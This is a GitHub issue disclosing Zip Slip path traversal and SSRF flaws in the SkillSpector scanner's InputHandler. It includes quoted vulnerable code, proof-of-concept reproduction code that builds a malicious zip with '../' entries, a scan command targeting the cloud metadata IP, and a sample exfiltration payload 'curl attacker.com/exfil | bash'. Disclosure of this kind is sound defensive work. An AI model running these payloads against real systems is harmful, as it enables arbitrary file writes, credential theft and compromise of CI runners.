Skip to content

[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler #147

Description

@mimran-khan

Summary

Imagine a post office that opens every parcel to inspect it for safety, but the inspection room has no blast containment — so a parcel designed to explode on opening detonates in the very facility meant to keep everyone safe. That's the paradox here: SkillSpector is a security scanner that is itself vulnerable to the attacks it should be detecting.

Two separate vulnerabilities exist in the InputHandler:

  1. Zip Slip (Path Traversal): When processing .zip skill archives, _extract_zip() calls zipfile.extractall() without validating that extracted paths stay within the target directory. A malicious zip can write files anywhere on the filesystem.

  2. SSRF (Server-Side Request Forgery): The _is_git_url() validation uses substring matching (if any(host in parsed.netloc for host in git_hosts)) and accepts any URL ending in .git. This allows an attacker to trick SkillSpector into making requests to internal network endpoints, cloud metadata services, or arbitrary hosts.

Relation to Existing Issues

This issue consolidates both under one coherent attack surface analysis of InputHandler, as they share the same root cause: the ingest layer processes attacker-controlled input without validation.

Why This Matters — Real-World Scenario

Scenario 1: Zip Slip in a CI/CD scanning pipeline

A company runs SkillSpector in their CI pipeline to vet community-submitted skills before publishing to an internal registry. The scanner runs as a GitHub Action on a shared runner.

A malicious contributor submits a skill as a .zip archive. Inside, the zip contains:

SKILL.md                                   (looks normal)
../../../home/runner/.bashrc               (payload: curl attacker.com/exfil | bash)

The CI pipeline downloads and scans the zip. SkillSpector's _extract_zip() unpacks it, writing to ../../../home/runner/.bashrc. The next time any job runs on that runner, the injected script exfiltrates secrets and source code.

Scenario 2: SSRF via Git URL on a cloud instance

The same pipeline accepts Git URLs for scanning. An attacker submits:

http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name.git

SkillSpector validates this URL: 169.254.169.254 is not in the default git_hosts list, but the URL ends in .git, and the fallback path accepts it. The scanner's host (an EC2 instance) issues a git clone to the metadata endpoint. Even though the clone fails, the HTTP request reaches the metadata service — and in some configurations, the error output or network logs expose IAM credentials.

In both cases, the security scanner itself becomes the attack vector.

Reproduction

Zip Slip

import zipfile, io, os, tempfile

# Create malicious zip
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr("SKILL.md", "---\nname: test\n---\n# Normal")
    zf.writestr("../../etc/pwned.txt", "you have been pwned")
buf.seek(0)

# Save and scan
with open("/tmp/evil-skill.zip", "wb") as f:
    f.write(buf.read())
skillspector scan /tmp/evil-skill.zip --no-llm
# Check if /tmp/etc/pwned.txt was created outside the temp extract dir
ls -la /tmp/etc/pwned.txt  # Should NOT exist, but it does

SSRF

# Point to an internal HTTP service (simulated)
skillspector scan "http://169.254.169.254/latest/meta-data.git" --no-llm
# Observe: git clone attempt is made to the metadata endpoint
# Even on failure, the HTTP request reaches the target

Root Cause

Zip Slip — src/skillspector/input_handler.py lines 181-182:

def _extract_zip(self, zip_path: Path) -> Path:
    extract_dir = Path(tempfile.mkdtemp())
    with zipfile.ZipFile(zip_path, "r") as zf:
        zf.extractall(extract_dir)  # No path traversal check!
    return extract_dir

Python's zipfile.extractall() does not prevent path traversal — it extracts entries with ../ prefixes to locations outside the target directory. The fix is to validate each entry's resolved path stays within extract_dir before extraction.

SSRF — src/skillspector/input_handler.py lines 105-117:

def _is_git_url(self, input_str: str) -> bool:
    git_hosts = ["github.com", "gitlab.com", "bitbucket.org"]
    parsed = urlparse(input_str)
    if parsed.scheme in ("http", "https", "git", "ssh"):
        if any(host in parsed.netloc for host in git_hosts):  # Substring match!
            return True
        if input_str.endswith(".git"):
            return True  # Any URL ending in .git is accepted
    return False

Two problems:

  1. Substring matching: "github.com" in "evil-github.com" is True — an attacker-controlled domain evil-github.com passes validation
  2. .git suffix fallback: Any URL ending in .git is accepted regardless of host, allowing internal network targets with a .git suffix

The _clone_git() method (lines 125-148) then runs git clone without --depth 1 safety flags or environment variables like GIT_TERMINAL_PROMPT=0 and GIT_ASKPASS=/bin/true to prevent credential leakage.

Impact

  • Zip Slip: Arbitrary file write on the host filesystem — can overwrite configuration files, inject backdoors into CI runners, or corrupt system files
  • SSRF: Network requests to internal services, cloud metadata endpoints (169.254.169.254), or arbitrary external hosts from the scanner's network position
  • Privilege escalation path: Zip Slip + CI runner = code execution as the CI service account
  • Supply chain risk: A scanner vulnerability means the security gate itself is compromised — all skills passing through it are at risk
  • Trust violation: Security tools are granted elevated access precisely because they're trusted; a vulnerability here has outsized blast radius

Affected Version

SkillSpector v2.2.3

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions